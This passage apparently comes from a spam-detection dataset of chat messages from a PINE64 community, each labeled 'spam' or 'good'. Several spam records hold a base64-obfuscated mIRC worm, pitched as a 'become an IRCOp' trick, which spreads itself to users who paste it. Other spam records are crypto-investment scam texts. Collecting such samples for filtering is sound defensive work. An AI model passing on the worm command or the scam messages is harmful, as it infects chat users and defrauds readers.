$decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "good", "text": "\u000304[T] \u000f- linux"}, {"category": "good", "text": "\u000307[D] \u000fit is down"}, {"category": "good", "text": "\u000304[T] \u000f- linux"}, {"category": "good", "text": "\u000314[T] \u000fi'm in a meeting"}, {"category": "good", "text": "\u000306[T] \u000fNo"}, {"category": "good", "text": "\u000306[T] <\ud83d\ude80> \u000fToo bad"}, {"category": "good", "text": "Just noticed - \"PinePhone save me\" \ud83d\ude04 \nhttps://youtu.be/oimX8sJ2CjE?t=194"}, {"category": "good", "text": "nice"}, {"category": "good", "text": "also defo in bug hunt for release mode, I'm supper happy with shakewake now"}, {"category": "good", "text": "<@318322437412487178> did you say it is unvalidated after the flash?"}, {"category": "good", "text": "andriod?"}, {"category": "good", "text": "I ahve"}, {"category": "spam", "text": "t\": \"Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .loa"}, {"category": "good", "text": "are you updating from the app, or via CLI?"}, {"category": "good", "text": "And those are the logs I collected: https://dropmefiles.com/4IRLI"}, {"category": "good", "text": "<@!377217763896459275> oh my god that was it, thank you!"}, {"category": "good", "text": "Noice"}, {"category": "good", "text": "I really gotta make my own fork"}, {"category": "good", "text": "you absolutely should"}, {"category": "good", "text": "Yeee"}, {"category": "good", "text": "ditto"}, {"category": "good", "text": "but with gadgetbridge"}, {"category": "good", "text": "https://github.com/KoalaV2/InfiniTime wooooo"}, {"category": "good", "text": "I would like to buy a PinePhone Pro with crypto, bitcoin or dogecoin or ethereum. It would be a great investment!"}, {"category": "good", "text": "i want!"}, {"category": "good", "text": "i gotta get a 3d printer!"}, {"category": "good", "text": "the thingiverse link is up there ^"}, {"category": "spam", "text": "I NEVER THOUGHT THAT I WILL EARN 5400$ PER WEEK! JUST JOIN MY MLM HERE: yeet"}, {"category": "spam", "text": "Lose All Your Money On Crypto Immediately! Earn Nothing! \ud83d\udcc9\ud83d\udcc9\ud83d\udcc9"}, {"category": "good", "text": "gstreamer has HW decoding"}, {"category": "good", "text": "collabora liked my tweet"}, {"category": "good", "text": "my life is now complete"}, {"category": "good", "text": "funeral: you always have the insights"}, {"category": "good", "text": "cryptozoology?"}, {"category": "good", "text": "<@!462579463562199040>"}, {"category": "good", "text": "\ud83d\ude04"}, {"category": "good", "text": "here is decribed how it's done: https://marius.bloggt-in-braunschweig.de/2020/12/11/das-nackte-pinephone-aufmotzen/"}, {"category": "spam", "text": "Here is a legitimate Trade account manager and platform that actually pays investors withdrawal at the end of trade section with no hidden fees.\nGUARANTEED RETURN ON INVESTMENT \n\n@earn_with_BestForexT\n\nDirect contact to her\n@earn_with_KyleLINDIA\n@earn_with_KyleLINDIA"}, {"category": "good", "text": "who are we supposed to be flagging about this new wave of spam?"}, {"category": "good", "text": "4350000 value"}, {"category": "good", "text": "deepl.com"}, {"category": "good", "text": "Sheibe"}, {"category": "good", "text": "pronounced: `shy-b`"}, {"category": "good", "text": "shibe ?"}, {"category": "good", "text": "??"}, {"category": "good", "text": "shibe"}, {"category": "good", "text": "shibe?"}, {"category": "good", "text": "shiba inu?"}, {"category": "good", "text": "doogoooooo"}, {"category": "good", "text": "HUnd"}, {"category": "good", "text": "dogo"}, {"category": "good", "text": "doooooooooooooogoooooooooooo"}, {"category": "good", "text": "bonjour"}, {"category": "good", "text": "cmon join the VC"}, {"category": "good", "text": "https://nitter.net/JustineSmithies/status/1457654688975831041#m"}, {"category": "good", "text": "https://nitter.net/ManjaroLinux/status/1457625556460113930#m"}, {"category": "good", "text": "hmm... http://termbin.com/jg5j"}, {"category": "good", "text": "have you tried echo -n ?"}, {"category": "good", "text": "thanks @funeral"}, {"category": "good", "text": "\u00bf?"}, {"category": "good", "text": "."}, {"category": "good", "text": "i got your point @funeral. thank you. this is sad"}, {"category": "good", "text": "*cough* numberstation *cough*"}, {"category": "good", "text": "kman: register on their new dev portal?"}, {"category": "good", "text": "vol doiwn patch recheck pls"}, {"category": "good", "text": "el wasn't criticizing you"}, {"category": "good", "text": "Nothing at all"}, {"category": "good", "text": "No"}, {"category": "good", "text": "Nothing happens. Can't charge, can't plug in mouse"}, {"category": "good", "text": "And it\u2019s connected"}, {"category": "good", "text": "Ugh. This is frustrating."}, {"category": "good", "text": "https://78.cdn.ekm.net/ekmps/shops/srbphotographic/images/leica-m39-lens-to-eos-m-adaptor-leica-m39-lens-to-canon-eos-m-camera-adaptor-10712-p.jpg?w=476&h=500&v=1"}, {"category": "good", "text": "```Schneider-Kreuznach XENAR 2.8/50mm Lens | M39 Paxette | Remarkable Bubble Bokeh!```"}, {"category": "spam", "text": "\ud83d\uded1Opportunity@ COIN GLOBAL ASSET\nSuper delighted!, I was referred to COIN GLOBAL ASSET by a very close colleague at the office and encouraged to invest. At first i was not ready to take such a risk considering my previous commitments in other investment platforms which yielded no profit. After much conviction and consideration i gave it a second thought realizing life itself is a big risk, i invested and today am boldly recommending \ud83d\udc49COIN GLOBAL ASSET \u2705 for any individual craving for financial independent.\ud83d\udcb0\ud83d\udcb0\nClick on my referral link below to get started and start earning @ COIN GLOBAL ASSET.\ud83d\udcb0\n\ud83d\udc47\ud83d\udc47\ud83d\udc47\nhttps://bit.ly/3qpdeKm \u2705\nhttps://bit.ly/3qpdeKm \u2705"}, {"category": "good", "text": "<@77833499842707456>"}, {"category": "good", "text": "https://en.m.wikipedia.org/wiki/High_Precision_Event_Timer"}, {"category": "good", "text": "?"}, {"category": "good", "text": "I don't have an iPhone just a friend who has one"}, {"category": "good", "text": "\ud83e\udd26\u200d\u2640\ufe0f"}, {"category": "good", "text": ";]"}, {"category": "good", "text": "\ud83d\ude0e"}, {"category": "good", "text": "noted"}, {"category": "good", "text": "<:froggychair:857346039966990357> ribbit"}, {"category": "good", "text": "\u1e9e"}, {"category": "good", "text": "a girl (millenial) after seen me at the train station, left the station walking, with bad expression face"}, {"category": "good", "text": "I'm still waiting on dev registration, but can you paste me any output from iwconfig ?"}, {"category": "good", "text": "I believe it is RTL8723CS"}, {"category": "good", "text": "uname -a"}, {"category": "good", "text": "no result"}, {"category": "good", "text": "noahhh."}, {"category": "good", "text": "dmesg > dmesg.log"}, {"category": "good", "text": "journalctl -b >jctl.log"}, {"category": "good", "text": "Do you have Ethernet conenction on your phone?"}, {"category": "good", "text": "it is an upstream bug"}, {"category": "good", "text": "https://github.com/zlin/wgetpaste"}, {"category": "good", "text": "\ud83d\ude04"}, {"category": "spam", "text": "Forwarded from Alrey: This is for bitcoin mining oriented program even if you are not an expert I have found a Legit automated system Where You Can Make 300% weekly wished I could send a video how it looks all you need is Cell phone or a computer. Through automated expert trading. So far I make over $34,200 weekly this doesn't have to do with investing shit these are automated earnings interested personnels can click the link below and sign up to start your earning process\nhttps://tinyurl.com/w99cvn85"}, {"category": "good", "text": "Oh god I just remembered I have one of these T_T. I need to make an enclosure"}, {"category": "spam", "text": "Want To Be An IRCop? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "good", "text": ";]"}, {"category": "good", "text": ":}"}, {"category": "good", "text": "cursed"}, {"category": "spam", "text": "Want To Be An IRCop? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ29wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExICAvL3dyaXRlICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyAkICQrIGRlY29kZShibVYzWWc9PSxtKSB9IH0=,m) | .load -rs"}, {"category": "good", "text": "L1d cache: 128 KiB"}, {"category": "good", "text": "L2 cache: 4 MiB"}, {"category": "good", "text": "L1i cache: 384 KiB"}, {"category": "good", "text": "23"}, {"category": "good", "text": "i thought nobody is using mirc this days"}, {"category": "good", "text": "and/or webchat log"}, {"category": "good", "text": "ffs"}, {"category": "good", "text": "so 273.15K? normal varies depending on how much you interact with Americans.."}, {"category": "good", "text": "en fuego por favor, comes to mind"}, {"category": "good", "text": "shh"}, {"category": "good", "text": ";]]]"}, {"category": "good", "text": "<@!218268648609939456> cross-platform cop"}, {"category": "good", "text": "\ud83d\udc80"}, {"category": "good", "text": "<@77833499842707456> how are the I r c o p spammers getting through?"}, {"category": "good", "text": "Pinesat"}, {"category": "good", "text": ":)"}, {"category": "good", "text": "thanks"}, {"category": "good", "text": "dsimic: https://pastebin.com/KEt7UFvc"}, {"category": "good", "text": "ok thank you!"}, {"category": "good", "text": "Uploaded it to testing and stable branches now too."}, {"category": "good", "text": "awesome, thank you!"}, {"category": "good", "text": "screw you"}, {"category": "good", "text": "?"}, {"category": "good", "text": ":("}, {"category": "good", "text": "atcwatch"}, {"category": "good", "text": "still getting spam from irc in other rooms @whoevermakesthebot"}, {"category": "good", "text": "that will be amazing!"}, {"category": "good", "text": "100KB for a bg"}, {"category": "good", "text": "What are all these \"Want to be an IRcop\" things"}, {"category": "good", "text": "Spam"}, {"category": "good", "text": "this is unedited"}, {"category": "good", "text": "Wdym?"}, {"category": "good", "text": "here"}, {"category": "good", "text": "this may take a while, i\u00b4m not ashamed to admit that i\u00b4m brady today"}, {"category": "good", "text": "+n"}, {"category": "good", "text": "<@77833499842707456>"}, {"category": "good", "text": ">:)"}, {"category": "good", "text": "epaper"}, {"category": "good", "text": "link, danct?"}, {"category": "good", "text": "\ud83d\ude1b"}, {"category": "good", "text": "#voice-chat-text"}, {"category": "good", "text": "i have been pinged"}, {"category": "good", "text": ":)"}, {"category": "good", "text": "eep"}, {"category": "good", "text": "huong memes"}, {"category": "good", "text": "k, ty"}, {"category": "good", "text": "maany options :)"}, {"category": "good", "text": "pong"}, {"category": "good", "text": "I'm here, TRS-80"}, {"category": "good", "text": "this happened to me right after i updated and rebooted phone"}, {"category": "good", "text": "I've reattached 3 PBP feet successfully using instant glue (cyanoacrylate)"}, {"category": "good", "text": "ooops"}, {"category": "good", "text": ";)))"}, {"category": "good", "text": ";))"}, {"category": "good", "text": "0.0.0.0 ;]"}, {"category": "good", "text": "192.168.1.2"}, {"category": "good", "text": "die"}, {"category": "good", "text": "hi maya"}, {"category": "good", "text": "no!"}, {"category": "good", "text": "you can try?"}, {"category": "good", "text": "@armen:"}, {"category": "good", "text": "and promptly opened a bug and assigned it to strit :)"}, {"category": "good", "text": "\ud83d\ude04"}, {"category": "good", "text": "maya ru a woman or girl?"}, {"category": "good", "text": "close it <@!398661839182888960>"}, {"category": "good", "text": "Why"}, {"category": "good", "text": "\ud83d\ude04"}, {"category": "good", "text": "Bruh"}, {"category": "good", "text": "Why you lie"}, {"category": "good", "text": "\ud83d\ude22"}, {"category": "good", "text": "thanks"}, {"category": "good", "text": "\ud83e\udd23"}, {"category": "good", "text": "school also saved my life"}, {"category": "good", "text": "<@!383697086098702337> here"}, {"category": "good", "text": "also school saved my life"}, {"category": "good", "text": "nice, maya"}, {"category": "good", "text": "are these yours, maya? \ud83d\ude1b"}, {"category": "good", "text": "Here\u2019s Aya."}, {"category": "good", "text": "\ud83d\ude1b"}, {"category": "good", "text": "https://trs-80.isnotmyreal.name/share/hold_me.jpg"}, {"category": "good", "text": "(and the touchpad)"}, {"category": "good", "text": "<@!192708523405213696>"}, {"category": "good", "text": "now to write file to microsd"}, {"category": "good", "text": "for this"}, {"category": "good", "text": "<@804798548725203044> awesome and thanks. Spot your tweet and will try out me image"}, {"category": "good", "text": "lovely cats"}, {"category": "good", "text": "i never flashed a new os to a phone before"}, {"category": "good", "text": "so this is new to me"}, {"category": "good", "text": "spicyoreo: if you want to try and fix it, I'd recommend mounting the filesystem from your phone on your computer, and enabling ssh."}, {"category": "good", "text": "oh my god"}, {"category": "good", "text": ":)"}, {"category": "good", "text": "well, glad to have helped"}, {"category": "good", "text": "thanks"}, {"category": "good", "text": "well, i am in NL, and am willing to trade a dev ptime for a sealed one..."}, {"category": "good", "text": "\ud83e\udd23"}, {"category": "good", "text": "the small items all come from ali for me, they do the vat thingy, so no surcharge"}, {"category": "good", "text": "Another one (with a connected dock):